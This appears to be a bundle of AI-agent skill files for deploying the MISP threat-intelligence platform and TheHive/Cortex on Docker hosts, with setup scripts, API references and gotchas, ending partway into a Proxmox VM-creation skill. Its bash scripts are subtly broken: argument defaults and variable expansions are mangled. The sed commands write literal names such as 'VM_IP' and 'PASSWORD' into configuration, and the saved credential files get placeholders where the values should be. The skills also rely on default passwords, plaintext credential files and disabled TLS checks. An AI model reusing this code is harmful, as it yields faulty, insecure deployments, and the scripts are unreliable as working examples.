--- name: soc-deploy-misp version: 1.0.0 description: "Deploy MISP threat intelligence platform on any Docker-ready Linux host. Official misp-docker project with automatic MariaDB memory tuning (prevents OOM on small VMs), API key generation via cake CLI, and credential management." tags: - soc - misp - threat-intelligence - security - docker - automation - ioc category: security --- # SOC Deploy: MISP (Malware Information Sharing Platform) Deploy MISP threat intelligence platform on any Docker-ready Linux host using the official misp-docker project. **This skill does NOT create VMs.** It expects an SSH target with Docker installed. Use `hyperv-create-vm` or `proxmox-create-vm` first if you need infrastructure. ## When to Use - "deploy misp" - "set up misp" - "install misp" - "threat intel platform" - "ioc sharing platform" ## User Inputs | Parameter | Default | Required | |-----------|---------|----------| | SSH target | - | Yes (user@host) | | Admin email | [email protected] | No | | Admin password | ChangeMe123! | No | | Host RAM (for buffer pool) | 4GB | No | ## Prerequisites Check ```bash # SSH works ssh <target> "echo OK" # Docker + Compose v2 ssh <target> "docker --version && docker compose version" # RAM check (need 3GB+ free) ssh <target> "free -h | grep Mem" ``` ## Execution ### Single command deployment ```bash scp scripts/setup.sh <target>:~/ ssh <target> "bash ~/setup.sh '[email protected]' '<password>'" ``` ### What setup.sh does 1. **Clone official misp-docker** from GitHub 2. **Configure .env:** - `MISP_BASEURL`, `MISP_ADMIN_EMAIL`, `MISP_ADMIN_PASSPHRASE` - Generate random MySQL passwords - Set `INNODB_BUFFER_POOL_SIZE` based on host RAM (CRITICAL) 3. **`docker compose up -d`** 4. **Poll for MISP readiness** (5-10 min on first boot for DB migrations) 5. **Generate API key** via cake CLI: ```bash docker compose exec -T misp /var/www/MISP/app/Console/cake user change_authkey <email> ``` 6. **Verify API** with `/servers/getVersion` 7. **Save credentials** to `~/misp/api-key.txt` ### Output to User ``` MISP deployed! URL: https://<target> Admin: [email protected] / <password> API Key: <key> MCP Connection: MISP_URL=https://<target> MISP_API_KEY=<key> MISP_VERIFY_SSL=false Note: Self-signed HTTPS. Use curl -k for API calls. Credentials saved to: ~/misp/api-key.txt ``` ## InnoDB Buffer Pool Sizing The #1 failure on small VMs. Default buffer pool is 2GB, which kills MariaDB on 4GB hosts. | Host RAM | INNODB_BUFFER_POOL_SIZE | |----------|------------------------| | 4 GB | 512M | | 8 GB | 2048M | | 16 GB | 4096M | ## Critical Gotchas See `references/gotchas.md` for full details: 1. **MariaDB OOM (showstopper):** Default InnoDB buffer pool is 2GB. On 4GB hosts, MariaDB crashes instantly. MUST set `INNODB_BUFFER_POOL_SIZE` in `.env` 2. **Recovery from OOM:** `docker compose down -v` to wipe failed DB volume, fix `.env`, restart 3. **First boot is slow:** 5-10 min for DB schema creation and initial data load 4. **Self-signed HTTPS:** Use `curl -k` for all API calls 5. **Advanced authkeys:** Enabled by default. `cake` CLI is the most reliable key generation method 6. **MISP web UI:** `https://<ip>` (port 443, not 80) ## Timeout Strategy Total: ~12-15 min (docker pull + first boot + setup). Split: - Turn 1: Clone, configure, `docker compose up -d` (~3 min + pull time) - Turn 2: Wait for health + generate API key (~5-7 min) ## Pairs With - `hyperv-create-vm` - create a Hyper-V VM, then deploy MISP on it - `proxmox-create-vm` - create a Proxmox LXC/VM, then deploy MISP on it - `soc-deploy-thehive` - deploy TheHive alongside for case management FILE:README.md # soc-deploy-misp Deploy MISP threat intelligence platform on any Docker-ready Linux host. Handles MariaDB memory tuning automatically, generates API keys via cake CLI. ## Platform Agnostic This skill deploys the application. It doesn't create infrastructure. Pair with: - `hyperv-create-vm` for Hyper-V VMs - `proxmox-create-vm` for Proxmox containers/VMs - Or any existing Linux host with Docker ## Key Fix: MariaDB OOM The #1 deployment failure on small hosts. Default InnoDB buffer pool is 2GB, which kills MariaDB on 4GB VMs. This skill auto-calculates the correct `INNODB_BUFFER_POOL_SIZE` based on available RAM. ## What Gets Automated - Official misp-docker clone and configuration - MariaDB memory tuning - Docker Compose deployment - Admin provisioning - API key generation via cake CLI - MCP connection info output ## Requirements - SSH access to a Linux host with Docker + Compose v2 - At least 3GB RAM free ## Tags soc, misp, threat-intelligence, security, docker, automation, ioc FILE:references/env-template.env # MISP .env template # Copy to misp-docker/.env and customize # MISP Core MISP_BASEURL=http://CHANGE_ME [email protected] MISP_ADMIN_PASSPHRASE=CHANGE_ME # MySQL/MariaDB MYSQL_HOST=db MYSQL_PORT=3306 MYSQL_DATABASE=misp MYSQL_USER=misp MYSQL_PASSWORD=CHANGE_ME_RANDOM MYSQL_ROOT_PASSWORD=CHANGE_ME_RANDOM # CRITICAL: Scale based on host RAM # 4GB host = 512M, 8GB = 2048M, 16GB = 4096M INNODB_BUFFER_POOL_SIZE=512M # Redis REDIS_FQDN=redis # MISP Modules MISP_MODULES_URL=http://misp-modules FILE:references/gotchas.md # Gotchas: MISP Deployment ## MariaDB OOM (Showstopper) - Default InnoDB buffer pool is **2GB** - On 4GB hosts, MariaDB crashes instantly with `Out of memory (Needed 2587885448 bytes)` - MariaDB container enters restart loop - **Fix:** Set `INNODB_BUFFER_POOL_SIZE` in `.env` BEFORE first `docker compose up` - Scaling: 4GB = 512M, 8GB = 2048M, 16GB = 4096M ## Recovery from OOM - If MariaDB already crashed with the wrong buffer size: 1. `docker compose down -v` (wipes failed DB volume) 2. Fix `INNODB_BUFFER_POOL_SIZE` in `.env` 3. `docker compose up -d` - Without `-v`, the corrupted DB volume persists and MariaDB keeps crashing ## First Boot is Slow - MISP takes 5-10 minutes on first boot - DB schema creation, initial data load, worker initialization - Web UI may show errors during this period - **Fix:** Poll `https://localhost/users/login` until it returns a login page ## Self-Signed HTTPS - MISP defaults to self-signed certificates - All `curl` commands need `-k` flag - For production: mount proper certs or put behind a reverse proxy ## API Key Generation - MISP has "advanced authkeys" enabled by default - The `cake` CLI inside the container is the most reliable method: ```bash docker compose exec -T misp /var/www/MISP/app/Console/cake user change_authkey <email> ``` - API alternative: session login then `POST /auth_keys/add`, but cake is simpler ## Web UI Port - MISP listens on HTTPS port 443 (not 80) - URL format: `https://<ip>` (no port needed) - Port 80 redirects to 443 ## Template .env - Official repo has `template.env`, copy to `.env` before editing - Don't edit `template.env` directly (git pull conflicts) FILE:scripts/setup.sh #!/bin/bash # Deploy MISP on any Docker-ready Linux host # Usage: ./setup.sh [admin-email] [admin-password] [host-ram-gb] # Run ON the target host (not remotely) set -euo pipefail ADMIN_EMAIL="[email protected]" PASSWORD="-ChangeMe123!" HOST_RAM_GB="-4" MISP_DIR=~/misp/misp-docker echo "=== MISP Deployment ===" echo "Admin: $ADMIN_EMAIL | RAM: HOST_RAM_GBGB" echo "" # Calculate buffer pool size case "$HOST_RAM_GB" in [1-5]) BUFFER_POOL="512M" ;; [6-9]) BUFFER_POOL="2048M" ;; 1[0-9]) BUFFER_POOL="4096M" ;; *) BUFFER_POOL="4096M" ;; esac echo "InnoDB buffer pool: $BUFFER_POOL (for HOST_RAM_GBGB RAM)" # Clone official misp-docker echo "[1/6] Cloning misp-docker..." mkdir -p ~/misp if [ -d "$MISP_DIR" ]; then echo " Already cloned, pulling latest..." cd "$MISP_DIR" && git pull --quiet else git clone --quiet https://github.com/MISP/misp-docker.git "$MISP_DIR" fi cd "$MISP_DIR" # Configure .env echo "[2/6] Configuring .env..." cp template.env .env VM_IP=$(hostname -I | awk '{print $1}') MYSQL_ROOT_PW=$(openssl rand -base64 24) MYSQL_PW=$(openssl rand -base64 24) sed -i "s|MISP_BASEURL=.*|MISP_BASEURL=http://VM_IP|" .env sed -i "s|MISP_ADMIN_EMAIL=.*|MISP_ADMIN_EMAIL=ADMIN_EMAIL|" .env sed -i "s|MISP_ADMIN_PASSPHRASE=.*|MISP_ADMIN_PASSPHRASE=PASSWORD|" .env # Set DB passwords grep -q "MYSQL_ROOT_PASSWORD" .env && \ sed -i "s|MYSQL_ROOT_PASSWORD=.*|MYSQL_ROOT_PASSWORD=MYSQL_ROOT_PW|" .env || \ echo "MYSQL_ROOT_PASSWORD=MYSQL_ROOT_PW" >> .env grep -q "MYSQL_PASSWORD" .env && \ sed -i "s|MYSQL_PASSWORD=.*|MYSQL_PASSWORD=MYSQL_PW|" .env || \ echo "MYSQL_PASSWORD=MYSQL_PW" >> .env # CRITICAL: Set InnoDB buffer pool to prevent MariaDB OOM grep -q "INNODB_BUFFER_POOL_SIZE" .env && \ sed -i "s|INNODB_BUFFER_POOL_SIZE=.*|INNODB_BUFFER_POOL_SIZE=BUFFER_POOL|" .env || \ echo "INNODB_BUFFER_POOL_SIZE=BUFFER_POOL" >> .env echo " Configured for $VM_IP with buffer pool $BUFFER_POOL" # Start stack echo "[3/6] Starting Docker Compose stack..." docker compose up -d # Wait for MISP (5-10 min on first boot) echo "[4/6] Waiting for MISP (first boot: 5-10 min)..." for i in $(seq 1 60); do if curl -sk https://localhost/users/login 2>/dev/null | grep -q "login\|UserLoginForm"; then echo " MISP is up! (~$((i * 10))s)" break fi if [ $i -eq 60 ]; then echo " WARNING: Still not responding after 10 min." echo " Check: docker compose logs misp" fi sleep 10 done # Generate API key echo "[5/6] Generating API key..." sleep 5 API_KEY=$(docker compose exec -T misp /var/www/MISP/app/Console/cake user change_authkey "$ADMIN_EMAIL" 2>/dev/null | grep -oP '[a-zA-Z0-9]{40}' | head -1) if [ -z "$API_KEY" ]; then echo " WARNING: Key generation failed. Try manually:" echo " docker compose exec misp /var/www/MISP/app/Console/cake user change_authkey $ADMIN_EMAIL" API_KEY="GENERATION_FAILED" fi # Verify echo "[6/6] Verifying API..." if [ "$API_KEY" != "GENERATION_FAILED" ]; then VER=$(curl -sk -H "Authorization: $API_KEY" -H "Accept: application/json" \ https://localhost/servers/getVersion 2>/dev/null | grep -o '"version":"[^"]*"' || echo "") [ -n "$VER" ] && echo " API verified! $VER" || echo " Key generated but verify returned empty (may still be loading)" fi # Save credentials cat > ~/misp/api-key.txt << EOF === MISP Credentials === Generated: $(date) MISP URL: https://VM_IP Admin: ADMIN_EMAIL / PASSWORD API Key: API_KEY MCP Connection: MISP_URL=https://VM_IP MISP_API_KEY=API_KEY MISP_VERIFY_SSL=false MySQL Root: MYSQL_ROOT_PW MySQL User: misp / MYSQL_PW InnoDB Buffer Pool: BUFFER_POOL Note: Self-signed HTTPS. Use curl -k for API calls. EOF echo "" echo "=== MISP Deployment Complete ===" echo "" echo "URL: https://VM_IP" echo "Admin: ADMIN_EMAIL / PASSWORD" echo "API Key: API_KEY" echo "" echo "Credentials saved to: ~/misp/api-key.txt"
Deploy TheHive 5 + Cortex 3 incident response platform on any Docker-ready Linux host. Automates account creation, API key generation, Cortex CSRF handling,...
--- name: soc-deploy-thehive version: 1.0.0 description: "Deploy TheHive 5 + Cortex 3 incident response platform on any Docker-ready Linux host. Automates account creation, API key generation, Cortex CSRF handling, and TheHive-Cortex integration wiring. Platform-agnostic." tags: - soc - thehive - cortex - incident-response - security - docker - automation - mcp category: security --- # SOC Deploy: TheHive 5.4 + Cortex 3.1.8 Deploy TheHive + Cortex incident response platform on any Docker-ready Linux host. **This skill does NOT create VMs.** It expects an SSH target with Docker installed. Use `hyperv-create-vm` or `proxmox-create-vm` first if you need infrastructure. ## When to Use - "deploy thehive" - "set up thehive" - "install thehive and cortex" - "thehive lab" - "incident response platform" ## User Inputs | Parameter | Default | Required | |-----------|---------|----------| | SSH target | - | Yes (user@host) | | Admin password | ChangeMe123! | No | | Org name (Cortex) | SOC | No | | TheHive secret | (generated 40-char) | No | ## Prerequisites Check ```bash # SSH works ssh <target> "echo OK" # Docker + Compose v2 ssh <target> "docker --version && docker compose version" # RAM check (need 4GB+ free) ssh <target> "free -h | grep Mem" ``` ## Execution ### Single command deployment ```bash scp scripts/setup.sh <target>:~/ scp references/docker-compose.yml <target>:~/thehive-cortex/docker-compose.yml ssh <target> "bash ~/setup.sh '<password>' '<org-name>'" ``` ### What setup.sh does (from thehive-cortex-setup-guide.md) 1. **Create directory + write docker-compose.yml** 2. **`docker compose up -d`** (Cassandra + ES + TheHive + Cortex) 3. **Poll health endpoints** until all services respond: - `GET :9200/_cluster/health` (Elasticsearch) - `GET :9000/api/status` (TheHive) - `GET :9001/api/status` (Cortex) 4. **TheHive admin setup:** - `POST /api/v1/login` with `[email protected]` / `secret` - `POST /api/v1/user/[email protected]/password/change` (NOT PATCH) - `POST /api/v1/user/[email protected]/key/renew` -> API key 5. **Cortex setup (CSRF dance):** - `POST /api/maintenance/migrate` - `POST /api/user` (create superadmin, first-user endpoint) - `POST /api/login` -> session cookie - `GET /api/user/admin` -> capture `CORTEX-XSRF-TOKEN` cookie - `POST /api/organization` (with CSRF cookie + header) - `POST /api/user` (org admin, with CSRF) - `POST /api/user/<org-admin>/key/renew` (with CSRF) -> org key - `POST /api/user/admin/key/renew` (with CSRF) -> super key 6. **Wire integration:** - Update docker-compose.yml: add `--cortex-hostnames cortex --cortex-keys <org-admin-key>` - `docker compose up -d thehive` (restart only TheHive) - Wait 30s for TheHive startup 7. **Verify both APIs** respond with Bearer keys 8. **Write credentials** to `~/thehive-cortex/api-keys.txt` ### Output to User ``` TheHive + Cortex deployed! TheHive: http://<target>:9000 Cortex: http://<target>:9001 Credentials: TheHive admin: [email protected] / <password> Cortex superadmin: admin / <password> Cortex org admin: <org>-admin (API key only) API Keys: TheHive: <key> Cortex superadmin: <key> Cortex org admin: <key> MCP Connection: THEHIVE_URL=http://<target>:9000 THEHIVE_API_KEY=<key> CORTEX_URL=http://<target>:9001 CORTEX_API_KEY=<key> Keys saved to: ~/thehive-cortex/api-keys.txt ``` ## Critical Gotchas See `references/gotchas.md` for full details: 1. **Cortex CSRF (biggest automation blocker):** Cookie `CORTEX-XSRF-TOKEN` + header `X-CORTEX-XSRF-TOKEN` on ALL mutating requests. Standard Play Framework bypass headers do NOT work. After first API key, use `Authorization: Bearer` to skip CSRF 2. **TheHive password endpoint:** `POST /password/change` with `currentPassword`+`password`. The PATCH endpoint returns 204 but silently ignores the password field 3. **Bash `!` in passwords:** Use `printf '...' | curl -d @-`, not direct `-d` with exclamation marks 4. **First-user one-shot:** Cortex `POST /api/user` without auth only works when zero users exist 5. **TheHive startup delay:** 15-30s after compose up (waits for Cassandra) 6. **Secret length:** TheHive Play Framework JWT needs 32+ char secret 7. **Use org admin key** (not superadmin) for TheHive-Cortex integration (least privilege) ## API Quick Reference See `references/api-reference.md` for the full endpoint list. ## Timeout Strategy Setup takes ~5-7 min (mostly waiting for services). If docker images are not cached, add ~5 min for pull. Split into: - Turn 1: `docker compose up -d` + pull images (~5 min) - Turn 2: Account setup + API keys (~3 min) ## Pairs With - `hyperv-create-vm` - create a Hyper-V VM, then deploy TheHive on it - `proxmox-create-vm` - create a Proxmox LXC/VM, then deploy TheHive on it - `soc-deploy-misp` - deploy MISP alongside for threat intelligence FILE:README.md # soc-deploy-thehive Deploy TheHive 5 + Cortex 3 incident response platform on any Docker-ready Linux host. Automates account creation, API key generation, Cortex CSRF dance, and TheHive-Cortex integration wiring. ## Platform Agnostic This skill deploys the application. It doesn't create infrastructure. Pair with: - `hyperv-create-vm` for Hyper-V VMs - `proxmox-create-vm` for Proxmox containers/VMs - Or any existing Linux host with Docker ## Stack - **TheHive 5.4** (case management, port 9000) - **Cortex 3.1.8** (observable analysis, port 9001) - **Elasticsearch 7.17** (shared index backend) - **Cassandra 4.1** (TheHive database) ## What Gets Automated - Docker Compose stack deployment - TheHive admin password change + API key generation - Cortex CSRF-aware superadmin + org setup - API key generation for all accounts - TheHive-Cortex integration wiring - MCP connection info output ## Requirements - SSH access to a Linux host with Docker + Compose v2 - At least 4GB RAM free ## Tags soc, thehive, cortex, incident-response, security, docker, automation, mcp FILE:references/api-reference.md # API Reference: TheHive + Cortex ## TheHive (port 9000) ### Authentication ```bash # Login (returns THEHIVE-SESSION cookie) curl -s -D - -X POST http://<host>:9000/api/v1/login \ -H 'Content-Type: application/json' \ -d '{"user":"[email protected]","password":"secret"}' # With API key (preferred for automation) curl -s http://<host>:9000/api/v1/user/current \ -H 'Authorization: Bearer <API_KEY>' ``` ### Password Management ```bash # Change password (CORRECT endpoint) printf '{"currentPassword":"old","password":"new"}' | \ curl -s -X POST "http://<host>:9000/api/v1/user/<login>/password/change" \ -H "Cookie: THEHIVE-SESSION=<session>" \ -H 'Content-Type: application/json' -d @- ``` ### API Key ```bash # Generate/renew API key curl -s -X POST "http://<host>:9000/api/v1/user/<login>/key/renew" \ -H "Cookie: THEHIVE-SESSION=<session>" # Returns plain text key ``` ### Status ```bash curl -s http://<host>:9000/api/status ``` ## Cortex (port 9001) ### First-Time Setup ```bash # DB migration (idempotent) curl -s -X POST http://<host>:9001/api/maintenance/migrate \ -H 'Content-Type: application/json' # Create superadmin (NO AUTH, only works when zero users) printf '{"login":"admin","name":"Admin","password":"pass","roles":["superadmin"]}' | \ curl -s -X POST http://<host>:9001/api/user \ -H 'Content-Type: application/json' -d @- ``` ### Authentication ```bash # Login (returns CORTEX_SESSION cookie) printf '{"user":"admin","password":"pass"}' | \ curl -s -D - -X POST http://<host>:9001/api/login \ -H 'Content-Type: application/json' -d @- # Get CSRF token (make GET with session, capture CORTEX-XSRF-TOKEN cookie) curl -s -D - http://<host>:9001/api/user/admin \ -H "Cookie: CORTEX_SESSION=<session>" ``` ### Organization Management (all need CSRF) ```bash # Create org curl -s -X POST http://<host>:9001/api/organization \ -H "Cookie: CORTEX_SESSION=<s>; CORTEX-XSRF-TOKEN=<csrf>" \ -H "X-CORTEX-XSRF-TOKEN: <csrf>" \ -H 'Content-Type: application/json' \ -d '{"name":"SOC","description":"SOC org","status":"Active"}' # Create org admin printf '{"name":"Admin","roles":["read","analyze","orgadmin"],"organization":"SOC","login":"soc-admin"}' | \ curl -s -X POST http://<host>:9001/api/user \ -H "Cookie: CORTEX_SESSION=<s>; CORTEX-XSRF-TOKEN=<csrf>" \ -H "X-CORTEX-XSRF-TOKEN: <csrf>" \ -H 'Content-Type: application/json' -d @- ``` ### API Keys (need CSRF) ```bash curl -s -X POST http://<host>:9001/api/user/<login>/key/renew \ -H "Cookie: CORTEX_SESSION=<s>; CORTEX-XSRF-TOKEN=<csrf>" \ -H "X-CORTEX-XSRF-TOKEN: <csrf>" # Returns plain text key ``` ### Status ```bash curl -s http://<host>:9001/api/status ``` FILE:references/docker-compose.yml version: "3.8" services: cassandra: image: cassandra:4.1 container_name: cassandra restart: unless-stopped environment: - MAX_HEAP_SIZE=1024M - HEAP_NEWSIZE=256M volumes: - cassandra-data:/var/lib/cassandra networks: - thehive-cortex elasticsearch: image: docker.elastic.co/elasticsearch/elasticsearch:7.17.24 container_name: elasticsearch restart: unless-stopped environment: - discovery.type=single-node - xpack.security.enabled=false - "ES_JAVA_OPTS=-Xms512m -Xmx512m" volumes: - elasticsearch-data:/usr/share/elasticsearch/data networks: - thehive-cortex thehive: image: strangebee/thehive:5.4 container_name: thehive restart: unless-stopped depends_on: - cassandra - elasticsearch ports: - "9000:9000" command: - "--secret" - "THEHIVE_SECRET_PLACEHOLDER" - "--cql-hostnames" - "cassandra" - "--index-backend" - "elasticsearch" - "--es-hostnames" - "elasticsearch" networks: - thehive-cortex cortex: image: thehiveproject/cortex:3.1.8-1 container_name: cortex restart: unless-stopped depends_on: - elasticsearch ports: - "9001:9001" environment: - job_directory=/tmp/cortex-jobs volumes: - cortex-data:/var/run/cortex networks: - thehive-cortex volumes: cassandra-data: elasticsearch-data: cortex-data: networks: thehive-cortex: driver: bridge FILE:references/gotchas.md # Gotchas: TheHive + Cortex Deployment ## Cortex CSRF Protection (Biggest Automation Blocker) Cortex uses Elastic4Play's custom CSRF filter. ALL POST/PUT/PATCH/DELETE requests with session cookies require a CSRF token. **The mechanism:** - Cookie name: `CORTEX-XSRF-TOKEN` - Header name: `X-CORTEX-XSRF-TOKEN` **How to get it:** 1. Login, get `CORTEX_SESSION` cookie 2. Make any GET request with session cookie 3. Response includes `Set-Cookie: CORTEX-XSRF-TOKEN=<token>` 4. Send token as BOTH cookie AND `X-CORTEX-XSRF-TOKEN` header **Bypass:** After generating an API key, use `Authorization: Bearer <key>` which skips CSRF entirely. **What does NOT work:** - `Csrf-Token: nocheck` - `X-CSRF-TOKEN` (standard Play header) - Any other standard CSRF bypass header ## TheHive Password Change - `PATCH /api/v1/user/<login>` returns 204 but **silently ignores** the password field - **Correct endpoint:** `POST /api/v1/user/<login>/password/change` - **Required body:** `{"currentPassword":"old","password":"new"}` ## Bash Exclamation Marks - Passwords with `!` break curl JSON due to bash history expansion - `-d '{"password":"Foo!"}'` causes parse errors - **Fix:** Always use `printf '...' | curl -d @-` ## Cortex First-User Endpoint - `POST /api/user` without authentication only works when zero users exist - After the first user, all user creation requires auth + CSRF - One-shot only. If it fails, the Cortex DB needs to be wiped ## TheHive Startup Delay - TheHive waits 30s for Cassandra on startup - Total boot time: 15-30s after `docker compose up` - Poll `GET /api/status` instead of fixed sleeps ## TheHive Secret Length - Play Framework JWT secret needs 32+ characters - Shorter secrets cause silent config errors - Generate with: `openssl rand -base64 32` ## Integration Key - Use the Cortex **org admin** API key for TheHive-Cortex integration - NOT the superadmin key (principle of least privilege) FILE:scripts/setup.sh #!/bin/bash # Deploy TheHive 5.4 + Cortex 3.1.8 on any Docker-ready Linux host # Usage: ./setup.sh [password] [org-name] [thehive-secret] # Run ON the target host (not remotely) set -euo pipefail PASSWORD="-ChangeMe123!" ORG_NAME="-SOC" TH_SECRET="-$(openssl rand -base64 32)" DEPLOY_DIR=~/thehive-cortex echo "=== TheHive + Cortex Deployment ===" echo "Password: $PASSWORD | Org: $ORG_NAME" echo "" # Setup directory mkdir -p "$DEPLOY_DIR" cd "$DEPLOY_DIR" # Write docker-compose.yml if not present if [ ! -f docker-compose.yml ]; then echo "[0/11] Writing docker-compose.yml..." # If the file was SCP'd earlier, skip. Otherwise the SKILL.md instructs to SCP it. echo "ERROR: docker-compose.yml not found. SCP it from references/docker-compose.yml first." exit 1 fi # Replace secret placeholder sed -i "s|THEHIVE_SECRET_PLACEHOLDER|TH_SECRET|g" docker-compose.yml # Start stack echo "[1/11] Starting Docker Compose stack..." docker compose up -d # Wait for Elasticsearch echo "[2/11] Waiting for Elasticsearch..." for i in $(seq 1 30); do if curl -sf http://localhost:9200/_cluster/health > /dev/null 2>&1; then echo " Elasticsearch is up!" break fi [ $i -eq 30 ] && { echo " TIMEOUT waiting for Elasticsearch"; exit 1; } sleep 10 done # Wait for TheHive echo "[3/11] Waiting for TheHive..." for i in $(seq 1 30); do if curl -sf http://localhost:9000/api/status > /dev/null 2>&1; then echo " TheHive is up!" break fi [ $i -eq 30 ] && { echo " TIMEOUT waiting for TheHive"; exit 1; } sleep 10 done # Wait for Cortex echo "[4/11] Waiting for Cortex..." for i in $(seq 1 30); do if curl -sf http://localhost:9001/api/status > /dev/null 2>&1; then echo " Cortex is up!" break fi [ $i -eq 30 ] && { echo " TIMEOUT waiting for Cortex"; exit 1; } sleep 10 done # TheHive: Login with defaults echo "[5/11] TheHive: Logging in with default creds..." TH_SESSION=$(curl -s -D - -X POST http://localhost:9000/api/v1/login \ -H 'Content-Type: application/json' \ -d '{"user":"[email protected]","password":"secret"}' 2>&1 | \ grep -i 'THEHIVE-SESSION' | head -1 | sed 's/.*THEHIVE-SESSION=//;s/;.*//' | tr -d '\r') # TheHive: Change password echo "[6/11] TheHive: Changing admin password..." printf '{"currentPassword":"secret","password":"%s"}' "$PASSWORD" | \ curl -sf -X POST "http://localhost:9000/api/v1/user/[email protected]/password/change" \ -H "Cookie: THEHIVE-SESSION=$TH_SESSION" \ -H 'Content-Type: application/json' -d @- > /dev/null # TheHive: Generate API key THEHIVE_KEY=$(curl -s -X POST "http://localhost:9000/api/v1/user/[email protected]/key/renew" \ -H "Cookie: THEHIVE-SESSION=$TH_SESSION") echo " TheHive API key: 0:20..." # Cortex: Run DB migration echo "[7/11] Cortex: Running DB migration..." curl -sf -X POST http://localhost:9001/api/maintenance/migrate \ -H 'Content-Type: application/json' > /dev/null # Cortex: Create superadmin echo "[8/11] Cortex: Creating superadmin..." printf '{"login":"admin","name":"Admin","password":"%s","roles":["superadmin"]}' "$PASSWORD" | \ curl -sf -X POST http://localhost:9001/api/user \ -H 'Content-Type: application/json' -d @- > /dev/null # Cortex: Login + get CSRF CX_SESSION=$(printf '{"user":"admin","password":"%s"}' "$PASSWORD" | \ curl -s -D - -X POST http://localhost:9001/api/login \ -H 'Content-Type: application/json' -d @- 2>&1 | \ grep -i 'CORTEX_SESSION' | head -1 | sed 's/.*CORTEX_SESSION=//;s/;.*//' | tr -d '\r') CSRF=$(curl -s -D - http://localhost:9001/api/user/admin \ -H "Cookie: CORTEX_SESSION=$CX_SESSION" 2>&1 | \ grep 'CORTEX-XSRF-TOKEN' | head -1 | sed 's/.*CORTEX-XSRF-TOKEN=//;s/;.*//' | tr -d '\r') # Cortex: Create org echo "[9/11] Cortex: Creating org '$ORG_NAME'..." curl -sf -X POST http://localhost:9001/api/organization \ -H "Cookie: CORTEX_SESSION=$CX_SESSION; CORTEX-XSRF-TOKEN=$CSRF" \ -H "X-CORTEX-XSRF-TOKEN: $CSRF" \ -H 'Content-Type: application/json' \ -d "{\"name\":\"$ORG_NAME\",\"description\":\"$ORG_NAME organization\",\"status\":\"Active\"}" > /dev/null # Cortex: Create org admin ORG_ADMIN="$(echo "$ORG_NAME" | tr '[:upper:]' '[:lower:]')-admin" printf '{"name":"%s Admin","roles":["read","analyze","orgadmin"],"organization":"%s","login":"%s"}' \ "$ORG_NAME" "$ORG_NAME" "$ORG_ADMIN" | \ curl -sf -X POST http://localhost:9001/api/user \ -H "Cookie: CORTEX_SESSION=$CX_SESSION; CORTEX-XSRF-TOKEN=$CSRF" \ -H "X-CORTEX-XSRF-TOKEN: $CSRF" \ -H 'Content-Type: application/json' -d @- > /dev/null # Cortex: Generate API keys echo "[10/11] Cortex: Generating API keys..." CORTEX_SUPER_KEY=$(curl -s -X POST http://localhost:9001/api/user/admin/key/renew \ -H "Cookie: CORTEX_SESSION=$CX_SESSION; CORTEX-XSRF-TOKEN=$CSRF" \ -H "X-CORTEX-XSRF-TOKEN: $CSRF") CORTEX_ORG_KEY=$(curl -s -X POST "http://localhost:9001/api/user/$ORG_ADMIN/key/renew" \ -H "Cookie: CORTEX_SESSION=$CX_SESSION; CORTEX-XSRF-TOKEN=$CSRF" \ -H "X-CORTEX-XSRF-TOKEN: $CSRF") # Wire TheHive-Cortex integration echo "[11/11] Wiring TheHive-Cortex integration..." if ! grep -q "cortex-hostnames" docker-compose.yml; then sed -i '/--es-hostnames/a\ - "--cortex-hostnames"\n - "cortex"\n - "--cortex-keys"\n - "'"$CORTEX_ORG_KEY"'"' docker-compose.yml fi docker compose up -d thehive echo " Waiting 30s for TheHive restart..." sleep 30 # Verify TH_CHECK=$(curl -sf http://localhost:9000/api/v1/user/current -H "Authorization: Bearer $THEHIVE_KEY" 2>&1 | grep -c login || echo "0") CX_CHECK=$(curl -sf http://localhost:9001/api/status -H "Authorization: Bearer $CORTEX_SUPER_KEY" 2>&1 | grep -c versions || echo "0") HOST_IP=$(hostname -I | awk '{print $1}') # Save credentials cat > "$DEPLOY_DIR/api-keys.txt" << EOF === TheHive + Cortex Credentials === Generated: $(date) TheHive: URL: http://HOST_IP:9000 User: [email protected] Password: $PASSWORD API Key: $THEHIVE_KEY Cortex: URL: http://HOST_IP:9001 Superadmin: admin / $PASSWORD Superadmin API Key: $CORTEX_SUPER_KEY Org Admin: $ORG_ADMIN (API key only) Org Admin API Key: $CORTEX_ORG_KEY MCP Connection: THEHIVE_URL=http://HOST_IP:9000 THEHIVE_API_KEY=$THEHIVE_KEY CORTEX_URL=http://HOST_IP:9001 CORTEX_API_KEY=$CORTEX_SUPER_KEY EOF echo "" echo "=== Deployment Complete ===" [ "$TH_CHECK" -gt 0 ] && echo "TheHive API: ✅" || echo "TheHive API: ❌" [ "$CX_CHECK" -gt 0 ] && echo "Cortex API: ✅" || echo "Cortex API: ❌" echo "" echo "TheHive: http://HOST_IP:9000" echo "Cortex: http://HOST_IP:9001" echo "" echo "TheHive Admin: [email protected] / $PASSWORD" echo "TheHive Key: $THEHIVE_KEY" echo "" echo "Cortex Super: admin / $PASSWORD" echo "Cortex Super Key: $CORTEX_SUPER_KEY" echo "Cortex Org: $ORG_ADMIN" echo "Cortex Org Key: $CORTEX_ORG_KEY" echo "" echo "Credentials saved to: $DEPLOY_DIR/api-keys.txt"
Create Ubuntu 24.04 LXC containers or full VMs on Proxmox VE. Docker-ready with Compose v2. Handles nesting for Docker-in-LXC, auto-picks next available CTID...
---
name: proxmox-create-vm
version: 1.0.0
description: "Create Ubuntu 24.04 LXC containers or full VMs on Proxmox VE. Docker-ready with Compose v2. Handles nesting for Docker-in-LXC, auto-picks next available CTID, and includes post-boot Docker setup."
tags:
- proxmox
- lxc
- vm
- ubuntu
- infrastructure
- automation
- docker
- homelab
category: infrastructure
---
# Proxmox VM/Container Creator
Create Ubuntu 24.04 LXC containers or full VMs on Proxmox VE. Returns a Docker-ready host with SSH access.
## When to Use
- "create proxmox vm"
- "create proxmox container"
- "spin up lxc"
- "new container on proxmox-host"
- Any time you need a fresh Linux host on Proxmox
This is a **base skill**. It creates the infrastructure. Other skills deploy applications onto it.
## LXC vs VM Decision Guide
| Use LXC when | Use VM when |
|---|---|
| Running Docker containers (TheHive, MISP, etc.) | Security Onion, Zeek with AF_PACKET |
| Lightweight services | Need custom kernel modules |
| Want fast startup (~5 seconds) | Need full OS isolation |
| Most SOC tools | Network monitoring with raw sockets |
**Default: LXC.** Only use VM when the application explicitly needs kernel access.
## User Inputs
| Parameter | Default | Required |
|-----------|---------|----------|
| Name | - | Yes |
| Proxmox host | proxmox-host (YOUR_PROXMOX_IP) | No |
| Type | lxc | No (lxc or vm) |
| CPU cores | 2 | No |
| RAM (MB) | 4096 | No |
| Disk (GB) | 8 | No |
